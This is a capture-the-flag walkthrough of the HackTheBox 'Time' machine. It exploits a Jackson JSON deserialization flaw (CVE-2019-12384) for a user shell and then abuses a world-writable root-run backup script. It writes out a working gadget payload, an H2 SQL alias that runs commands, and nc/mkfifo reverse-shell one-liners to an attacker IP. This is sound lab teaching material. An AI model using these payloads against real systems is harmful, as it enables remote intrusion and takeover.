Time HackTheBox WalkThrough

This is Time HackTheBox machine walkthrough. In this writeup, I have demonstrated step-by-step how I rooted Time HTB machine. Before starting let us know something about this machine. It is a Linux box with IP address 10.10.10.214 and difficulty medium assigned by its maker.

First of all connect your PC with VPN and make sure your connectivity with Time machine by pinging its IP 10.10.10.214. If all goes correct then it is time to start hacking. As usual, I started by scanning the machine. Scanning give us an idea how we have to proceed further. Like, it helps in banner grabbing the services running over different ports and sometimes it helps in vulnerability scanning also. I have used nmap for scanning and the result is given below:-

Scanning

$nmap -sC -sV -oN time.nmap 10.10.10.214

Nmap revealed that port 22 and 80 are open. OpenSSH on port 22 and Apache2 web server on port 80 are running. Since apache2 is running on port 80 so there must be some website hosted on this server which can be accessed at URL http://10.10.10.214:80 or simply http://10.10.10.214 . Ongoing to this URL found that this website is for Beautifying & Validating JSON (JavaScript Object Notation).

Tried to validate and beautify some fake JSONs from internet and it worked fine. But when I tried to inject some payload of XSS (just for testing) it gave validation error. Validation error exposes that this website is using Jackson library for JSON deserialization (deserialization  is basically converting JSON code back to object to store them on disk).

Soon I got information about Jackson Library immediately I googled for Jackson library vulnerability and got this link  and then this CVE-2019-12384 on very first page. According to this article the application that uses Jackson library for JSON deserialization were affected with deserialization vulnerability where an attacker could control the class that is to be deserialized. You should read above blog to know how this vulnerability actually work and the way to reproduce them. Another PoC of this vulnerability can be found at GitHub.

Getting User Shell

After finding the steps on GitHub, I did the following things to exploit this vulnerability.

1. Created a file named inject.sql and put the following content into it.

CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {String[] command = {"bash", "-c", cmd};java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");return s.hasNext() ? s.next() : ""; }$$;CALL SHELLEXEC('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.10 1234 >/tmp/f')

$cat inject.sql

You should replace the IP address in SHELLEXEC() function at last line of above code.

2. Started python httpserver to host this file.

3. Started netcat listener to listen on port 1234 in another window.

4. Entered the following code in the input field of the website after choosing the option Validate(beta) and then clicked on PROCESS button.

["ch.qos.logback.core.db.DriverManagerConnectionSource",{"url": "jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http:\/\/10.10.14.10:80\/inject.sql'"}]

The above code is in its beautified form you can also use it’s raw form for getting reverse shell.

Start Python HttpServer

$ sudo python3 -m http.server 80

Start Netcat Listener

$ nc -nvlp 1234

$ whoami && id

We got a user shell. Let us upgrade it to fully qualified Linux shell so that we can execute more advanced Linux command through it.

Upgrading Shell

$ python3 -c 'import pty;pty.spawn("/bin/bash")'

$ export TERM=xterm

$ CTRL+Z //To background the shell

$ stty raw -echo

$ fg //To foreground the shell and press two times enter

Capture User Flag

$cat /home/pericles/user.txt

Privilege Escalation

To escalate privilege to root we have to first find a privilege escalation vector using which we can escalate privilege. For this I ran linpeas.sh (a post exploitation enumeration script) on time machine. It gives us information of all potential vectors that can be used to escalate privilege to root.

Finding PrivEsc Vector

Linpeas found a script timer_backup.sh inside the directory /usr/bin/ which is writeable by normal users.

Confirmed it by checking its permission and to remove false positive.

$ ls -la /usr/bin/timer_backup.sh

Its permission is rwx (readable, writeable and executable) for user pericles. But when I tried to execute this script it gave me permission denied. One thing is clear that this script can only be executed by root user. So, if root user can execute this script it means all the content inside this file is executed by root privilege. So if we introduce our reverse shell payload inside this file then it will also get executed by root privilege and we can get root shell. I did the same and easily got root shell. So here our PrivEsc vector is Privilege Escalation due to exploitation of Unwanted File Permission given to normal user.

Getting Root Shell

To get root shell I did the following things:-

1. Started netcat listener in one window.

2. Written our reverse shell payload in the file timer_backup.sh (since normal user can modify this file).

This script is executed by root at regular interval (I think at interval of 5-10 sec, exactly don’t know just guessing but in my case it took about 5-10 sec gap). Now when it execute next time it will also execute our reverse shell code and we will get root shell.

On Kali Machine

$nc -nvlp 4321

On Time Machine

$echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.10 4321 >/tmp/f' >>/usr/bin/timer_backup.sh

We are root now. Let’s capture root flag.

Capture Root Flag

$cat /root/root.txt

This was how I rooted to the Time HackTheBox machine. Learnt a lot during this challenge. Hope you guys have also learnt some new things. Thanks for reading this walkthrough. Share your experience in the comment section. Want to give any suggestion about the writeup feel free to write us at [email protected]. Check out our latest walkthroughs at https://ethicalhacs.com/ .